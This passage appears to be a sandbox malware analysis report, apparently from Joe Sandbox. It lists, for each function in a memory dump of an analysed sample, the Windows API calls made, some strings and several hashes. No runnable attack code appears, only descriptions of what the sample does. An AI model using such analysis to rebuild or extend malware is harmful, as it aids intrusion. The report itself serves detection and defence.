                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 02c6485bee722a3099140b948bda4a39054b5bfc49d1aa9464ce9b64c47479fb
                                    • Instruction ID: afc01834daecd5ec7fd51969a4b9bf53e7f79b448a4eee86483c4984395628ef
                                    • Opcode Fuzzy Hash: 02c6485bee722a3099140b948bda4a39054b5bfc49d1aa9464ce9b64c47479fb
                                    • Instruction Fuzzy Hash: 4A415271A1010C9FCB68EF64EC82BDE7778AF54304F448065B51AD7241EB78AE85DF91
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F77F31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F77F60
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F77FA5
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F77FD3
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F78007
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 616aa798a227f3fbabba31856f69cbb6b92fffb4125d2bfdf8db15205083975f
                                    • Instruction ID: 62dbe689709d9d3d468969bad5d523218c9f54676c030819fc510393fe3f370d
                                    • Opcode Fuzzy Hash: 616aa798a227f3fbabba31856f69cbb6b92fffb4125d2bfdf8db15205083975f
                                    • Instruction Fuzzy Hash: 0F41B23190420ADFCB20EF68D580EDEB7B8FF54310B11809AE819D7245E775EA52DBD2
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F780BB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F780EA
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F78102
                                    • lstrlen.KERNEL32(00000000), ref: 00F78140
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7816F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0a5a4ef4d05379ce5d2c733de46e28d20948e3fecf6525ec61729ba7e4c2094f
                                    • Instruction ID: 07a56ad202c9bb3c5463ba237e696197656c9b297116992e88f364344975968b
                                    • Opcode Fuzzy Hash: 0a5a4ef4d05379ce5d2c733de46e28d20948e3fecf6525ec61729ba7e4c2094f
                                    • Instruction Fuzzy Hash: 2D410231A40106DFCB20DF78D998BAABBF4EF44350F00802EA859D7204EF74D942DB91
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00F81B72
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8184F
                                      • Part of subcall function 00F81820: lstrlen.KERNEL32(00A87328), ref: 00F81860
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F81887
                                      • Part of subcall function 00F81820: lstrcat.KERNEL32(00000000,00000000), ref: 00F81892
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F818C1
                                      • Part of subcall function 00F81820: lstrlen.KERNEL32(00F94FA0), ref: 00F818D3
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F818F4
                                      • Part of subcall function 00F81820: lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F81900
                                      • Part of subcall function 00F81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00F8192F
                                    • sscanf.NTDLL ref: 00F81B9A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F81BB6
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F81BC6
                                    • ExitProcess.KERNEL32 ref: 00F81BE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
                                    • Opcode ID: 4d93022af20b72646d2bc8636ad0d867d21a8c1676b143d2bf04690914445881
                                    • Instruction ID: 975cda4fc9f56d37bcb2ae656d4b662cb42c8f12860a3ce1705dd6604cfe817a
                                    • Opcode Fuzzy Hash: 4d93022af20b72646d2bc8636ad0d867d21a8c1676b143d2bf04690914445881
                                    • Instruction Fuzzy Hash: 3221F5B1518305AF8354EF65D88589FBBF8FFC8214F408A1EF5A9C3214E730D5058BA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F83166
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8316D
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C198,00000000,00020119,?), ref: 00F8318C
                                    • RegQueryValueExA.ADVAPI32(?,00A9DEB0,00000000,00000000,00000000,000000FF), ref: 00F831A7
                                    • RegCloseKey.ADVAPI32(?), ref: 00F831B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: e962f53b16c55dcde25fa6ca1f2cb92f589d8d96e3114e575782882f8525e16d
                                    • Instruction ID: 4397136ff72d8d88753e513b6a0a60da15f7972e376c0b207a85d1eb832a0b49
                                    • Opcode Fuzzy Hash: e962f53b16c55dcde25fa6ca1f2cb92f589d8d96e3114e575782882f8525e16d
                                    • Instruction Fuzzy Hash: 90119472A00208AFD714DF95D849FABB7BCF749B11F004129FA25E3684D775590087A1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 31612cb9d80d8ba7ad4e50f82ab8088f44b27b1e61f58c09783252b3dc254c39
                                    • Instruction ID: 91d57797e6e105c388c0991979c8e2d6dc401126bf18653ba08b24fffe928463
                                    • Opcode Fuzzy Hash: 31612cb9d80d8ba7ad4e50f82ab8088f44b27b1e61f58c09783252b3dc254c39
                                    • Instruction Fuzzy Hash: BC41FC7150875C5EDB31AB24CC89FFB7BFC9B45704F1C44E8E58686182D2B59A45EF20
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1D5
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F689CD
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: f94050518aecb3ec7140692adbaee11ff46d3a8e79f19810aff187c36608f70a
                                    • Instruction ID: 57aff8159a9d358f6e8a87eda236122f21b621677620058bb5ad9b6fc1ad5832
                                    • Opcode Fuzzy Hash: f94050518aecb3ec7140692adbaee11ff46d3a8e79f19810aff187c36608f70a
                                    • Instruction Fuzzy Hash: A521E7723006505BDB20DEACE840A6AF7A9DBA17E1B140B3FF541CB241CB75DC42E7A6
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68883
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 50fffda8f11a8fc8e58827b8a540ea2603c564abd32c2a3942294ae72f339b05
                                    • Instruction ID: 4ca3ac4ca2b6a8d84fb182d11ac225742ca62862ef59a2828c20f32efef1bc55
                                    • Opcode Fuzzy Hash: 50fffda8f11a8fc8e58827b8a540ea2603c564abd32c2a3942294ae72f339b05
                                    • Instruction Fuzzy Hash: BC31B5B5E005159BCB08DF58C8906AEBBB6EB98350F148269E915AB385DB34AD02CB91
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85922
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85935
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: ecbaebef357a90d274b06e8be8e19bb81ce67fbb5f4a10831e4bc3b5bce69904
                                    • Instruction ID: 8cea7c236aef7da5b9aa4893a4701052382621c8b25fe8ec481cd79346e45608
                                    • Opcode Fuzzy Hash: ecbaebef357a90d274b06e8be8e19bb81ce67fbb5f4a10831e4bc3b5bce69904
                                    • Instruction Fuzzy Hash: E411A531704B40CBD731AF2CE800B5977E1ABD1B70F250B9EE0D187695D761D841E7A1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00F8A430,000000FF), ref: 00F83D20
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F83D27
                                    • wsprintfA.USER32 ref: 00F83D37
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 4b2545fb2752230779c94987b8e032da2a06520ae3c59188b75ad20dc6ee2e54
                                    • Instruction ID: 03980d9cc76cdcea1b9b44dbb5c6e186cb2df87a8ea242a53edd452baacc8923
                                    • Opcode Fuzzy Hash: 4b2545fb2752230779c94987b8e032da2a06520ae3c59188b75ad20dc6ee2e54
                                    • Instruction Fuzzy Hash: 5601C072640708BBE724AB55DC0AF6ABB6CFB46B65F140129FA359B2C0C7B45900C7A2
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68737
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
